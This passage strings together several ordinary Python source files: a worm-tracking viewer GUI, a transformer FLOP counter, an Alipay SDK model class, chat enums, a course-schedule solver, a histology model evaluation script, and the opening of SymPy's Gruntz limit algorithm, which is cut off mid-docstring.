'nt':\n # I Windows the paths return by QFileDialog use / as the file\n # separation character. We need to correct it.\n for field_name in ['vfilename', 'skeletons_file']:\n setattr(\n self, field_name, getattr(\n self, field_name).replace(\n '/', os.sep))\n has_skeletons_file = ((self.skeletons_file is not None)\n and (self.skeletons_file != ''))\n if has_skeletons_file:\n save_modified_table(self.skeletons_file,\n self.trajectories_data,\n 'trajectories_data')\n\n if self.is_fov_tosplit:\n if has_skeletons_file:\n self.fovsplitter.write_fov_wells_to_file(self.skeletons_file)\n else:\n warnings.warn('No skeletons file. Saving wells info in masked video')\n self.fid.close()\n self.fovsplitter.write_fov_wells_to_file(self.vfilename)\n # self.fid = tables.File(self.vfilename, 'r')\n self.updateVideoFile(self.vfilename)\n\n if has_skeletons_file:\n self.updateSkelFile(self.skeletons_file)\n\n\n\n def updateVideoFile(self, vfilename):\n super().updateVideoFile(vfilename)\n self.updateImage()\n\n def updateSkelFile(self, skeletons_file):\n super().updateSkelFile(skeletons_file)\n\n if self.trajectories_data is None:\n #empty file nothing to do here\n self.updateImage()\n return\n\n #correct the `worm_index_N` to the actual name `worm_index_manual`\n if 'worm_index_N' in self.trajectories_data:\n self.trajectories_data = self.trajectories_data.rename(\n columns={'worm_index_N': 'worm_index_manual'})\n\n #if this is really a trajectories_data not (_features.hdf5) add `worm_index_manual` if it does not exists\n if not 'worm_index_manual' in self.trajectories_data and not self.is_estimated_trajectories_data:\n self.trajectories_data['worm_label'] = self.wlab['U']\n self.trajectories_data['worm_index_manual'] = self.trajectories_data['worm_index_joined']\n\n #deactiate the save option if we are dealing with estimated data...\n self.ui.pushButton_save.setEnabled(not self.is_estimated_trajectories_data)\n\n\n #add this column if it does not exist\n if not 'has_skeleton' in self.trajectories_data:\n self.trajectories_data['has_skeleton'] = self.trajectories_data['skeleton_id'] >= 0\n\n self.updateWormIndexTypeMenu()\n self.updateImage()\n\n def updateWormIndexTypeMenu(self):\n possible_indexes = [x.replace('worm_index_', '') for x in self.trajectories_data.columns if x.startswith('worm_index_')]\n assert len(set(possible_indexes)) == len(possible_indexes) #all indexes ending must be different\n\n menu_names = sorted([x + ' index' for x in possible_indexes])\n self.ui.comboBox_labelType.clear()\n self.ui.comboBox_labelType.addItems(menu_names)\n if 'manual' in possible_indexes:\n dd = self.ui.comboBox_labelType.findText('manual index')\n self.ui.comboBox_labelType.setCurrentIndex(dd);\n\n self.selectWormIndexType()\n\n def selectWormIndexType(self):\n index_option = self.ui.comboBox_labelType.currentText()\n\n if not index_option:\n return\n assert index_option.endswith(' index')\n self.worm_index_type = 'worm_index_' + index_option.replace(' index', '')\n\n # select between automatic and manual worm indexing and label\n if self.worm_index_type == 'worm_index_manual':\n self.label_type = 'worm_label'\n self.enable_trajectories_buttons(True)\n self.enable_label_buttons(True)\n else:\n self.label_type = 'auto_label'\n self.enable_trajectories_buttons(False)\n self.enable_label_buttons(False)\n\n #recalculate the grouped indexes\n self.traj_worm_index_grouped = self.trajectories_data.groupby(self.worm_index_type)\n\n self.updateImage()\n\n\n # update image\n def updateImage(self):\n if (self.image_group is None) and (self.isimgstore is False):\n return\n\n super(TrackerViewerAuxGUI, self).readCurrentFrame()\n\n # read the data of the particles that exists in the frame\n self.frame_data = self.getFrameData(self.frame_number)\n\n #draw extra info only if the worm_index_type is valid\n if self.frame_data is not None and \\\n self.worm_index_type in self.frame_data:\n #filter any -1 index\n self.frame_data = self.frame_data[self.frame_data[self.worm_index_type]>=0]\n if self.frame_data.size > 0:\n self.draw_worm_markers(self.frame_qimg)\n self.draw_food_contour(self.frame_qimg)\n\n self.updateROIs()\n\n else:\n self.clearROIs()\n # plot wells\n self.draw_wells(self.frame_qimg)\n\n # create the pixmap for the label\n self.mainImage.setPixmap(self.frame_qimg)\n\n self.display_intensity()\n\n def selectWorm(self, event):\n\n x = event.pos().x()\n y = event.pos().y()\n print(x,y)\n\n if self.frame_data is None or self.frame_data.size == 0:\n return\n\n R = (x - self.frame_data['coord_x'])**2 + \\\n (y - self.frame_data['coord_y'])**2\n\n ind = R.idxmin()\n\n good_row = self.frame_data.loc[ind]\n if np.sqrt(R.loc[ind]) < good_row['roi_size']:\n self.current_roi.worm_index = int(good_row[self.worm_index_type])\n self.update_plot()\n\n self.updateImage()\n\n def toggleWellStatus(self, event):\n # abort if not multifov\n if self.is_fov_tosplit != True:\n return\n # event is for sure a right click or this does not get called\n x = event.pos().x()\n y = event.pos().y()\n # this will always return something. n/a if clicking outside a well\n well_name = self.fovsplitter.find_well_of_xy(x, y)[0].decode('utf-8')\n idx = self.fovsplitter.wells['well_name'] == str(well_name)\n self.fovsplitter.wells.loc[idx, 'is_good_well'] = \\\n np.mod(self.fovsplitter.wells.loc[idx, 'is_good_well']+1, 2)\n# print(self.fovsplitter.wells)\n self.updateImage()\n\n def joinTraj(self):\n super().joinTraj()\n self.update_plot()\n\n def splitTraj(self):\n super().splitTraj()\n self.update_plot()\n\n def change_feature(self):\n super().change_feature()\n self.update_plot()\n\nif __name__ == '__main__':\n import sys\n\n app = QApplication(sys.argv)\n main = MWTrackerViewer_GUI(argv=sys.argv)\n\n #mask_file = '/Users/avelinojaver/OneDrive - Imperial College London/tierpsy_examples/mutliworm_example/BRC20067_worms10_food1-10_Set2_Pos5_Ch2_02062017_121709.hdf5'\n #mask_file = '/Volumes/rescomp1/data/WormData/screenings/Pratheeban/First_Set/MaskedVideos/Old_Adult/16_07_22/W3_ELA_1.0_Ch1_22072016_131149.hdf5'\n #mask_file = '/Users/avelinojaver/Documents/GitHub/tierpsy-tracker/tests/data/AVI_VIDEOS/MaskedVideos/AVI_VIDEOS_1.hdf5'\n# mask_file = '/Users/avelinojaver/Documents/GitHub/tierpsy-tracker/tests/data/WT2/MaskedVideos/WT2.hdf5'\n mask_file = '/Users/lferiani/Hackathon/multiwell_tierpsy/12_FEAT_TIERPSY_forGUI/MaskedVideos/20191205/syngenta_screen_run1_bluelight_20191205_151104.22956805/metadata.hdf5'\n main.updateVideoFile(mask_file)\n\n main.show()\n sys.exit(app.exec_())\n"} {"ext": "py", "sha": "1a2fe978c192b9bc4458f081aa6ee8b19d6746e0", "content": "from typing import List\n\nimport numpy as np\n\nclass DNNLayer:\n def __init__(self, out_shape, depends_on: List[\"DNNLayer\"] = tuple(), param_count=0):\n assert out_shape is not None # get around varargs restriction\n self.extra_repr_params = {}\n self.unique_idx = \"{}{:02d}\".format(self.__class__.__name__, id(self) % 100)\n self.out_shape = out_shape\n self.depends_on = depends_on\n self.param_count = param_count\n\n def __repr__(self):\n args = self.extra_repr_params\n args[\"out_shape\"] = self.out_shape\n args[\"param_count\"] = self.param_count\n args[\"depends_on\"] = \"[{}]\".format(\", \".join([x.unique_idx for x in self.depends_on]))\n return \"{}({})\".format(self.unique_idx, \",\".join([\"{}={}\".format(k, v) for k, v in args.items()]))\n\nclass QueryKeyValueMatrix(DNNLayer):\n\t# Fusing Query, Key, And Value into 1\n\tdef __init__(self, SEQ_LEN, HIDDEN_DIM, I, ATTN_HEADS, input):\n\t\tsuper().__init__(\n\t\t\tout_shape=(3 * SEQ_LEN,I,ATTN_HEADS), # [seq_lean X intermediate_vector_dim] for 12 heads \n\t\t\tdepends_on=[input] if input is not None else [],\n\t\t\tparam_count=3 * HIDDEN_DIM*I*ATTN_HEADS)\n\t\tself.flop = 3 * SEQ_LEN*HIDDEN_DIM*I*ATTN_HEADS\n\nclass QKTMatrix(DNNLayer):\n\t# Fusing Masking and Dropout\n\tdef __init__(self, SEQ_LEN, HIDDEN_DIM, I, ATTN_HEADS, input):\n\t\tsuper().__init__(\n\t\t\tout_shape=(SEQ_LEN,I,ATTN_HEADS),\n\t\t\tdepends_on=[input] if input is not None else [], # Different to accept a list\n\t\t\tparam_count=0)\n\t\tself.flop = SEQ_LEN*HIDDEN_DIM*I*ATTN_HEADS + np.prod(self.out_shape) + np.prod(self.out_shape) # QKT + mask + dropout\n\nclass Mask(DNNLayer):\n def __init__(self, input: DNNLayer):\n super().__init__(\n \tout_shape=input.out_shape, \n \tdepends_on=[input] if input is not None else [],\n \tparam_count=0)\n self.flop = np.prod(self.out_shape)\n\nclass QKTVMatrix(DNNLayer):\n\t# QKTV + Concat\n\tdef __init__(self, SEQ_LEN, HIDDEN_DIM, I, ATTN_HEADS, input):\n\t\tsuper().__init__(\n\t\t\tout_shape=(SEQ_LEN,I * ATTN_HEADS),\n\t\t\tdepends_on=[input] if input is not None else [],\n\t\t\tparam_count=0)\n\t\tself.flop = SEQ_LEN*HIDDEN_DIM*I*ATTN_HEADS + SEQ_LEN*HIDDEN_DIM*I*ATTN_HEADS # QKTVMatrix + Concat\n\nclass Concat(DNNLayer):\n\tdef __init__(self, SEQ_LEN, HIDDEN_DIM, I, ATTN_HEADS, input):\n\t\tsuper().__init__(\n\t\t\tout_shape=(SEQ_LEN,I * ATTN_HEADS),\n\t\t\tdepends_on=[input] if input is not None else [],\n\t\t\tparam_count=HIDDEN_DIM*I*ATTN_HEADS)\n\t\t# self.flop = SEQ_LEN*HIDDEN_DIM*I*ATTN_HEADS\n\t\tself.flop = 0\n\nclass LinearLayerReLU(DNNLayer):\n def __init__(self, in_features: int, out_features: int, input: DNNLayer):\n super().__init__(\n self.find_outshape(in_features, out_features, input),\n [input] if input is not None else [],\n param_count=((in_features + 1) * out_features),\n )\n self.extra_repr_params[\"in_features\"] = in_features\n self.extra_repr_params[\"out_features\"] = out_features\n self.in_features = in_features\n self.out_features = out_features\n self.flop = 2 * self.param_count + self.out_features + np.prod(self.out_shape) # (Linear) + ReLU\n\n def find_outshape(self, in_features, out_features, input):\n assert len(input.out_shape) == 2 and input.out_shape[1] == in_features, f\"{input.out_shape}, {in_features}\"\n return (input.out_shape[0], out_features)\n\ndef selfattn_flop(B, H, K, Tc, Tg, cache_length=0):\n\tassert cache_length >= 0, \"cache_length should be non-negative\"\n\n\tx = DNNLayer(out_shape=(B, Tc, H))\n\tqkt = QKTMatrix(SEQ_LEN=Tc, HIDDEN_DIM=H, I=H//K, ATTN_HEADS=K, input=x)\n\tmask = Mask(input=x)\n\tflops = qkt.flop + mask.flop\n\tfor i in range(1, Tg):\n\t\tx = DNNLayer(out_shape=(B, Tc + i, H))\n\t\tif i <= cache_length:\n\t\t\tqkt = QKTMatrix(SEQ_LEN=1, HIDDEN_DIM=H, I=H//K, ATTN_HEADS=K, input=x)\n\t\telse:\n\t\t\tqkt = QKTMatrix(SEQ_LEN=Tc + i, HIDDEN_DIM=H, I=H//K, ATTN_HEADS=K, input=x)\n\t\tflops += qkt.flop\n\n\tprint(f\"selfattn_flop: {flops}\")\n\treturn flops\n\nif __name__ == \"__main__\":\n\t\n\thparams = {\"117M\": (12, 768), \"345M\": (24, 1024), \"762M\": (36, 1280), \"1542M\": (48, 1600)}\n\tK = 4\n\tB, H = hparams[\"117M\"]\n\tTc = 128\n\tTg = 128\n\n\tselfattn_flop(B=B, H=H, K=K, Tc=Tc, Tg=Tg, cache_length=0)\n\tselfattn_flop(B=B, H=H, K=K, Tc=Tc, Tg=Tg, cache_length=64)\n\tselfattn_flop(B=B, H=H, K=K, Tc=Tc, Tg=Tg, cache_length=128)\n\n\n\n"} {"ext": "py", "sha": "1a2fe9c92a6d945dfd2ba4172ed35e87e3b9f918", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass TradeFundBillDetail(object):\n\n def __init__(self):\n self._amount = None\n self._asset_type_code = None\n self._asset_user_id = None\n self._biz_pay_type = None\n self._create_time = None\n self._payment_no = None\n\n @property\n def amount(self):\n return self._amount\n\n @amount.setter\n def amount(self, value):\n self._amount = value\n @property\n def asset_type_code(self):\n return self._asset_type_code\n\n @asset_type_code.setter\n def asset_type_code(self, value):\n self._asset_type_code = value\n @property\n def asset_user_id(self):\n return self._asset_user_id\n\n @asset_user_id.setter\n def asset_user_id(self, value):\n self._asset_user_id = value\n @property\n def biz_pay_type(self):\n return self._biz_pay_type\n\n @biz_pay_type.setter\n def biz_pay_type(self, value):\n self._biz_pay_type = value\n @property\n def create_time(self):\n return self._create_time\n\n @create_time.setter\n def create_time(self, value):\n self._create_time = value\n @property\n def payment_no(self):\n return self._payment_no\n\n @payment_no.setter\n def payment_no(self, value):\n self._payment_no = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.amount:\n if hasattr(self.amount, 'to_alipay_dict'):\n params['amount'] = self.amount.to_alipay_dict()\n else:\n params['amount'] = self.amount\n if self.asset_type_code:\n if hasattr(self.asset_type_code, 'to_alipay_dict'):\n params['asset_type_code'] = self.asset_type_code.to_alipay_dict()\n else:\n params['asset_type_code'] = self.asset_type_code\n if self.asset_user_id:\n if hasattr(self.asset_user_id, 'to_alipay_dict'):\n params['asset_user_id'] = self.asset_user_id.to_alipay_dict()\n else:\n params['asset_user_id'] = self.asset_user_id\n if self.biz_pay_type:\n if hasattr(self.biz_pay_type, 'to_alipay_dict'):\n params['biz_pay_type'] = self.biz_pay_type.to_alipay_dict()\n else:\n params['biz_pay_type'] = self.biz_pay_type\n if self.create_time:\n if hasattr(self.create_time, 'to_alipay_dict'):\n params['create_time'] = self.create_time.to_alipay_dict()\n else:\n params['create_time'] = self.create_time\n if self.payment_no:\n if hasattr(self.payment_no, 'to_alipay_dict'):\n params['payment_no'] = self.payment_no.to_alipay_dict()\n else:\n params['payment_no'] = self.payment_no\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = TradeFundBillDetail()\n if 'amount' in d:\n o.amount = d['amount']\n if 'asset_type_code' in d:\n o.asset_type_code = d['asset_type_code']\n if 'asset_user_id' in d:\n o.asset_user_id = d['asset_user_id']\n if 'biz_pay_type' in d:\n o.biz_pay_type = d['biz_pay_type']\n if 'create_time' in d:\n o.create_time = d['create_time']\n if 'payment_no' in d:\n o.payment_no = d['payment_no']\n return o\n\n\n"} {"ext": "py", "sha": "1a2fea07750d6014226f0bc33440cd6ceaed26d9", "content": "from typing import TYPE_CHECKING\n\n# typing doesnt understand aenum so im pretending its stdlib enum while type checking\n\nif TYPE_CHECKING:\n import enum\nelse:\n import aenum as enum\n\n\n__all__ = (\n \"ChannelType\",\n \"PresenceType\",\n \"RelationshipType\",\n \"AssetType\",\n \"SortType\",\n)\n\nclass ChannelType(enum.Enum):\n saved_message = \"SavedMessage\"\n direct_message = \"DirectMessage\"\n group = \"Group\"\n text_channel = \"TextChannel\"\n voice_channel = \"VoiceChannel\"\n\nclass PresenceType(enum.Enum):\n busy = \"Busy\"\n idle = \"Idle\"\n invisible = \"Invisible\"\n online = \"Online\"\n\nclass RelationshipType(enum.Enum):\n blocked = \"Blocked\"\n blocked_other = \"BlockedOther\"\n friend = \"Friend\"\n incoming_friend_request = \"Incoming\"\n none = \"None\"\n outgoing_friend_request = \"Outgoing\"\n user = \"User\"\n\nclass AssetType(enum.Enum):\n image = \"Image\"\n video = \"Video\"\n text = \"Text\"\n audio = \"Audio\"\n file = \"File\"\n\nclass SortType(enum.Enum):\n latest = \"Latest\"\n oldest = \"Oldest\"\n relevance = \"Relevance\"\n"} {"ext": "py", "sha": "1a2fea9c884de04b9d8461dfabf1a0c9a9419dee", "content": "'''\nThere are a total of numCourses courses you have to take, labeled from 0 to numCourses-1.\n\nSome courses may have prerequisites, for example to take course 0 you have to first take course 1, which is expressed as a pair: [0,1]\n\nGiven the total number of courses and a list of prerequisite pairs, is it possible for you to finish all courses?\n\n**Example 1**\n\n`Input: numCourses = 2, prerequisites = [[1,0]]`\n`Output: true`\n\nExplanation: There are a total of 2 courses to take.\nTo take course 1 you should have finished course 0. So it is possible.\n\n**Example 2**\n`Input: numCourses = 2, prerequisites = [[1,0],[0,1]]`\n`Output: false`\n\nExplanation: There are a total of 2 courses to take.\nTo take course 1 you should have finished course 0, and to take course 0 you should\nalso have finished course 1. So it is impossible.\n\n**Note**\nYou may assume that there are no duplicate edges in the input prerequisites.\n'''\n\nfrom collections import defaultdict\n\n\nclass Solution(object):\n def __init__(self):\n self.eligibleCourses = []\n self.visited = []\n\n def seedEligibleCourses(self, g):\n for index, node in g.items():\n if len(node) == 0 and index not in self.visited:\n self.eligibleCourses.append(index)\n\n def dfs(self, node, g):\n if node in self.visited:\n return\n\n self.visited.append(node)\n for _, n in g.items():\n if node in n:\n n.remove(node)\n\n for successor in g[node]:\n if successor not in self.visited:\n self.eligibleCourses.append(successor)\n self.dfs(node, g)\n\n def canFinish(self, numCourses, prerequisites):\n if not prerequisites:\n return True\n\n graph = defaultdict(list)\n for relation in prerequisites:\n currentCourse, prerequisite = relation[0], relation[1]\n graph[prerequisite].append(currentCourse) # post order!!\n if currentCourse not in graph:\n graph[currentCourse] = []\n\n self.seedEligibleCourses(graph)\n while self.eligibleCourses:\n current = self.eligibleCourses.pop(0)\n self.dfs(current, graph)\n self.seedEligibleCourses(graph)\n\n for _, n in graph.items():\n if len(n) > 0:\n return False\n return True\n"} {"ext": "py", "sha": "1a2fead4cdba019420ee37f32acc4de5822c2905", "content": "\n#%% load the background\nfrom __future__ import print_function, division\nimport torch\nfrom torchvision import datasets, transforms\nimport os\nimport matplotlib.pyplot as plt\nimport seaborn as sns; sns.set()\nimport pandas as pd\nimport numpy as np\nimport torch.nn as nn\n\n#%% define the datasets\nlist_datasets = ['/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/original',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/normalized_to_HE',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/normalized_to_tumorLymphnode_165',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/normalized_to_onlyH',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/tumorLymphnode/patches/size_165/original',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/tumorLymphnode/patches/size_165/normalized_to_HE_165',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/tumorLymphnode/patches/size_165/normalized_to_camelyon_165',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/tumorLymphnode/patches/size_165/normalized_to_onlyH_165'\n ]\nlist_dataset_names = ['camelyon_ori', 'camelyon_to_HE', 'camelyon_to_tL', 'camelyon_to_H',\n 'tumorLymphnode_ori', 'tumorLymphnode_to_HE', 'tumorLymphnode_to_ca', 'tumorLymphnode_to_H']\n\nlist_models = ['/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/original/model_ResNet152.pt',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/normalized_to_HE/model_ResNet152.pt',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/normalized_to_tumorLymphnode_165/model_ResNet152.pt',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/normalized_to_onlyH/model_ResNet152.pt' ]\n\nlist_model_names = ['ResNet_original', \"ResNet_normalized_to_HE\", \"ResNet_normalized_to_tumorLymphnode\", \"ResNet_normalized_to_H\"]\n\n#%% iterate over all datasets (and later over all models)\nlist_model = []\nlist_dataset = []\nlist_kappa = []\nlist_accuracy = []\nlist_loss = []\n\nfor idataset, tdataset in enumerate(list_datasets):\n #print(idataset)\n\n #%% define the folder\n if tdataset.find(\"patches\") > 0:\n dataset2use = \"val\"\n else:\n dataset2use = 'test'\n\n # %%define the function to get the data\n def get_datatransform(inputSize, data_dir):\n\n data_transforms = {\n dataset2use: transforms.Compose([\n transforms.Resize([inputSize, inputSize]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n }\n\n image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x),\n data_transforms[x])\n for x in [dataset2use]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=4,\n shuffle=False, num_workers=4)\n for x in [dataset2use]}\n\n return(data_transforms, image_datasets, dataloaders)\n\n #%% prepare the transformations and the dataset\n data_transforms , image_datasets, dataloaders= get_datatransform(259, tdataset)\n\n class_names = dataloaders[dataset2use].dataset.classes\n nb_classes = len(class_names)\n confusion_matrix = torch.zeros(nb_classes, nb_classes)\n\n #%% visualize the input data (to look if evey class is evenly)\n class_names = ['normal', 'tumor']\n\n df = pd.DataFrame(dataloaders[dataset2use].dataset.samples)\n df.columns = ['file', 'class_nr']\n\n df.class_nr = np.array(df.class_nr)\n\n class_labels = ['NaN' for x in range(df.shape[0])]\n for i in range(0,df.shape[0]):\n class_labels[i] = class_names[df.class_nr[int(i)]]\n df = df.assign(class_labels = class_labels)\n sns.set_palette(\"Set1\", n_colors = 12)\n sns.countplot(df.class_labels)\n plt.xlabel('Pattern')\n plt.ylabel('Count [n]')\n plt.savefig('DataBase_' + dataset2use + '.jpg')\n plt.show()\n plt.close()\n\n n_normal = sum(map(lambda x : x == \"normal\", class_labels))\n n_tumor = sum(map(lambda x: x == \"tumor\", class_labels))\n print(\"n = \" + str(n_normal) + \" tiles without and n = \" + str(n_tumor) + \" tiles with tumor.\")\n\n #%% iterate over the models\n from sklearn.metrics import cohen_kappa_score\n from sklearn.metrics import accuracy_score\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n n = 0\n df_values = pd.DataFrame(list(range(0,len(dataloaders[dataset2use].sampler.data_source.imgs))))\n\n for imodel, tmodel in enumerate(list_models):\n print(imodel)\n\n #%% prepare the dataset\n inputSize = 224\n data_transforms, image_datasets, dataloaders = get_datatransform(inputSize, tdataset)\n\n #%% apply model on test data set (and get a confusion matrix)\n model_ft = torch.load(tmodel)\n model_ft.eval()\n vector_prd = []\n vector_exp = []\n\n with torch.no_grad():\n for i, (inputs, classes) in enumerate(dataloaders[dataset2use]):\n inputs = inputs.to(device)\n classes = classes.to(device)\n outputs = model_ft(inputs)\n _, preds = torch.max(outputs, 1)\n\n if i == 0:\n outputs_matrix = outputs\n else:\n outputs_matrix = torch.cat((outputs_matrix, outputs), 0)\n\n vector_prd = vector_prd + preds.view(-1).cpu().tolist()\n vector_exp = vector_exp + classes.view(-1).cpu().tolist()\n\n confusion_matrix = torch.zeros(nb_classes, nb_classes)\n for x, y in zip(vector_exp, vector_prd):\n confusion_matrix[y, x] += 1\n\n loss_function = nn.CrossEntropyLoss()\n loss_value = loss_function(outputs_matrix.to('cpu'), torch.tensor(vector_exp))\n print(confusion_matrix)\n\n #%% calcualte the comparison values\n list_model.append(list_model_names[imodel])\n list_dataset.append(list_dataset_names[idataset])\n list_kappa.append(cohen_kappa_score(vector_prd, vector_exp))\n list_accuracy.append(accuracy_score(vector_prd, vector_exp))\n list_loss.append(loss_value.tolist())\n print('Kappa-value: ' + str(list_kappa[-1]))\n print('Accurary-value: ' + str(list_accuracy[-1]))\n\n #%% plot a confusion matrix\n matrix2plot = confusion_matrix.numpy()\n matrix2plot = matrix2plot.astype(int)\n\n ax = sns.heatmap(matrix2plot,\n annot = True, linewidths=5, annot_kws={\"size\": 10},\n xticklabels=class_names, yticklabels=class_names,\n cmap = \"Blues\")\n plt.xlabel('Ground Truth')\n plt.ylabel('Model ' + list_model[-1] + \" on \" + list_dataset[-1])\n plt.savefig('ConfMat_' +'Model ' + list_model[-1] + \" on \" + list_dataset[-1] + '.jpg')\n plt.show()\n plt.close()\n\n#%% make a dataframe\ndf = pd.DataFrame(list(zip(list_model, list_dataset, list_kappa)), columns=['model', 'data', 'kappa'])\ndf = df.pivot_table(index = [\"model\"], columns = [\"data\"], values = \"kappa\")\ndf.to_csv('/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/table.csv')\ndf.to_excel('/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/table.xlsx')\nwith open('/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/table.tex', 'w') as tf:\n tf.write(df.to_latex())"} {"ext": "py", "sha": "1a2feae71d87f1c61be44ff563c96ea2e1ff4ca0", "content": "def is_element(element):\n\n pass\n\n"} {"ext": "py", "sha": "1a2feb1d38513c2e04722f0abbb4308498ded0bc", "content": "\"\"\"\nLimits\n======\n\nImplemented according to the PhD thesis\nhttp://www.cybertester.com/data/gruntz.pdf, which contains very thorough\ndescriptions of the algorithm including many examples. We summarize here\nthe gist of it.\n\nAll functions are sorted according to how rapidly varying they are at\ninfinity using the following rules. Any two functions f and g can be\ncompared using the properties of L:\n\nL=lim log|f(x)| / log|g(x)| (for x -> oo)\n\nWe define >, < ~ according to::\n\n 1. f > g .... L=+-oo\n\n we say that:\n - f is greater than any power of g\n - f is more rapidly varying than g\n - f goes to infinity/zero faster than g\n\n 2. f < g .... L=0\n\n we say that:\n - f is lower than any power of g\n\n 3. f ~ g .... L!=0, +-oo\n\n we say that:\n - both f and g are bounded from above and below by suitable integral\n powers of the other\n\nExamples\n========\n::\n 2 < x < exp(x) < exp(x**2) < exp(exp(x))\n 2 ~ 3 ~ -5\n x ~ x**2 ~ x**3 ~ 1/x ~ x**m ~ -x\n exp(x) ~ exp(-x) ~ exp(2x) ~ exp(x)**2 ~ exp(x+exp(-x))\n f ~ 1/f\n\nSo we can divide all the functions into comparability classes (x and x^2\nbelong to one class, exp(x) and exp(-x) belong to some other class). In\nprinciple, we could compare any two functions, but in our algorithm, we\ndo not compare anything below the class 2~3~-5 (for example log(x) is\nbelow this), so we set 2~3~-5 as the lowest comparability class.\n\nGiven the function f, we find the list of most rapidly varying (mrv set)\nsubexpressions of it. This list belongs to the same comparability class.\nLet's say it is {exp(x), exp(2x)}. Using the rule f ~ 1/f we find an\nelement \"w\" (either from the list or a new one) from the same\ncomparability class which goes to zero at infinity. In our example we\nset w=exp(-x) (but we could also set w=exp(-2x) or w=exp(-3x) ...). We\nrewrite the mrv set using w, in our case {1/w, 1/w^2}, and substitute it\ninto f. Then we expand f into a series in w::\n\n f = c0*w^e0 + c1*w^e1 + ... + O(w^en), where e0oo, lim f = lim c0*w^e0, because all the other terms go to zero,\nbecause w goes to zero faster than the ci and ei. So::\n\n for e0>0, lim f = 0\n for e0<0, lim f = +-oo (the sign depends on the sign of c0)\n for e0=0, lim f = lim c0\n\nWe need to recursively compute limits at several places of the algorithm, but\nas is shown in the PhD thesis, it always finishes.\n\nImportant functions from the implementation:\n\ncompare(a, b, x) compares \"a\" and \"b\" by computing the limit L.\nmrv(e, x) returns list of most rapidly varying (mrv) subexpressions of \"e\"\nrewrite(e, Omega, x, wsym) rewrites \"e\" in terms of w\nleadterm(f, x) returns the lowest power term in the series of f\nmrv_leadterm(e, x) returns the lead term (c0, e0) for e\nlimitinf(e, x) computes lim e (for x->oo)\nlimit(e, z, z0) computes any limit by converting it to the case x->oo\n\nAll the functions are really simple and straightforward except\nrewrite(), which is the most difficult/complex part of the algorithm.\nWhen the algorithm fails, the bugs are usually in the series expansion\n(i.e. in SymPy) or in rewrite.\n\nThis code is almost exact rewrite of the Maple code inside the Gruntz\nthesis.\n\nDebugging\n---------\n\nBecause the gruntz algorithm is highly recursive, it's difficult to\nfigure out what went wrong inside a debugger. Instead, turn on nice\ndebug prints by defining the environment variable SYMPY_DEBUG. For\nexample:\n\n[user@localhost]: SYMPY_DEBUG=True ./bin/isympy\n\nIn [1]: limit(sin(x)/x, x, 0)\nlimitinf(_x*sin(1/_x), _x) = 1\n+-mrv_leadterm(_x*sin(1/_x), _x) = (1, 0)\n| +-mrv(_x*sin(1/_x), _x) = set([_x])\n| | +-mrv(_x, _x) = set([_x])\n| | +-mrv(sin(1/_x), _x) = set([_x])\n| | +-mrv(1/_x, _x) = set([_x])\n| | +-mrv(_x, _x) = set([_x])\n| +-mrv_leadterm(exp(_x)*sin(exp(-_x)), _x, set([exp(_x)])) = (1, 0)\n| +-rewrite(exp(_x)*sin(exp(-_x)), set([exp(_x)]), _x, _w) = (1/_w*sin(_w), -_x)\n| +-sign(_x, _x) = 1\n| +-mrv_leadterm(1, _x) = (1, 0)\n+-sign(0, _x) = 0\n+-limitinf(1, _x) = 1\n\nAnd check manually which line is wrong. Then go to the source code and\ndebug this function to figure out the exact problem.\n\n\"\"\"\nfrom functools import reduce\n\nfrom sympy.core import Basic, S, Mul, PoleError\nfrom sympy.core.cache import cacheit\nfrom sympy.core.numbers import ilcm, I, oo\nfrom sympy.core.symbol import Dummy, Wild\nfrom sympy.core.traversal import bottom_up\n\nfrom sympy.functions import log, exp, sign as _sign\nfrom sympy.series.order import Order\nfrom sympy.simplify import logcombine\nfrom sympy.simplify.powsimp import powsimp, powdenest\n\nfrom sympy.utilities.misc import debug_decorator as debug\nfrom sympy.utilities.timeutils import timethis\n\ntimeit = timethis('gruntz')\n\n\ndef compare(a, b, x):\n \"\"\"Returns \"<\" if a\" for a>b\"\"\"\n # log(exp(...)) must always be simplified here for termination\n la, lb = log(a), log(b)\n if isinstance(a, Basic) and (isinstance(a, exp) or (a.is_Pow and a.base == S.Exp1)):\n la = a.exp\n if isinstance(b, Basic) and (isinstance(b, exp) or (b.is_Pow and b.base == S.Exp1)):\n lb = b.exp\n\n c = limitinf(la/lb, x)\n if c == 0:\n return \"<\"\n elif c.is_infinite:\n return \">\"\n else:\n return \"=\"\n\n\nclass SubsSet(dict):\n \"\"\"\n Stores (expr, dummy) pairs, and how to rewrite expr-s.\n\n Explanation\n ===========\n\n The gruntz algorithm needs to rewrite certain expressions in term of a new\n variable w. We cannot use subs, because it is just too smart for us. For\n example::\n\n > Omega=[exp(exp(_p - exp(-_p))/(1 - 1/_p)), exp(exp(_p))]\n > O2=[exp(-exp(_p) + exp(-exp(-_p))*exp(_p)/(1 - 